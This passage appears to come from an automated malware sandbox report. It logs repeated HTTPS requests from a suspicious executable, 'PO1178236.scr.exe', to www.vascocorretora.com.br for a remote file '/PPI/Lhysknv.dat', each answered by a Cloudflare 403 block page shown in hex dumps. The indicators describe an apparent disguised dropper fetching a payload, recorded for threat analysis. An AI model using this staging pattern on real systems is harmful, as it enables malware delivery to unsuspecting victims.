2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:32 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:36:32 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:36:32 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 63 31 35 64 35 33 37 63 65 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1c15d537cee</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:36:32 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 63 31 35 64 35 33 37 63 65 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1c15d537cee',t:'MTczNjQwODE5Mi4wMDAwMDA='};var a=d
        2025-01-09 07:36:32 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        58192.168.2.949766188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:32 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:32 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:32 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:47 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x7LfVvm2wLzhWS9jow9wMXP%2FV4vL6lhf12SaunqtJ5sw2PQUf%2BapdatrDs6Aw9OT12bbi42O6k2%2F8FyN3%2FhvSwNV07D%2BF6gYUXEeTTedRv2MBICTh8fYkaRHbC%2BF7BzTYwInJjvNGBkOVYsY"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1c53a4241e1-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1852&min_rtt=1846&rtt_var=704&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1541710&cwnd=243&unsent_bytes=0&cid=59c060b42c192408&ts=148&x=0"
        2025-01-09 07:36:32 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:32 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:32 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:32 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 63 35 33 61 34 32 34 31 65 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1c53a4241e1</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:32 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 63 35 33 61 34 32 34 31 65 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1c53a4241e1',t:'MTczNjQwODE5Mi4wMDAwMDA='}
        2025-01-09 07:36:32 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        59192.168.2.949767188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:33 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:33 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:33 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:48 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UfKisX2fvF%2FnW8douKIDZJVu0LaDoDYyOyAmKRj%2FQALFmDezle6PqA%2FLK0kFfNe61hx9LTSkUuAZIvbGAuPMtuOniT4kEhw9azvh7i6r68Vv5gyXopaEcVp7diL3wdFOyJzHgN61hRdeiSiU"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1c90d174399-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1558&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1777236&cwnd=225&unsent_bytes=0&cid=7a36d42e7e488c51&ts=148&x=0"
        2025-01-09 07:36:33 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:33 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:33 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:33 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 63 39 30 64 31 37 34 33 39 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1c90d174399</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:33 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 63 39 30 64 31 37 34 33 39 39 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1c90d174399',t:'MTczNjQwODE5My4wMDAwMDA='};var a
        2025-01-09 07:36:33 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        60192.168.2.949768188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:33 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:34 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:34 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:49 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=97%2BXx10B%2FVHfN4nlsyLtwBPkDg%2BeUDCimhyZTMXDy2fieJY9c0P%2FXdaWolMgNjnUplXhyDWhA2ce%2FYCzlpeiAqB3MwEa35HhS5WU1qaueYNNUjpaHyV3JB8z8r98%2B5kUsEdQgSvh%2BXBODfjz"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1ccd8f0421c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2138&min_rtt=2133&rtt_var=811&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1340679&cwnd=252&unsent_bytes=0&cid=1f6bdb268c8b2e87&ts=155&x=0"
        2025-01-09 07:36:34 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:34 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
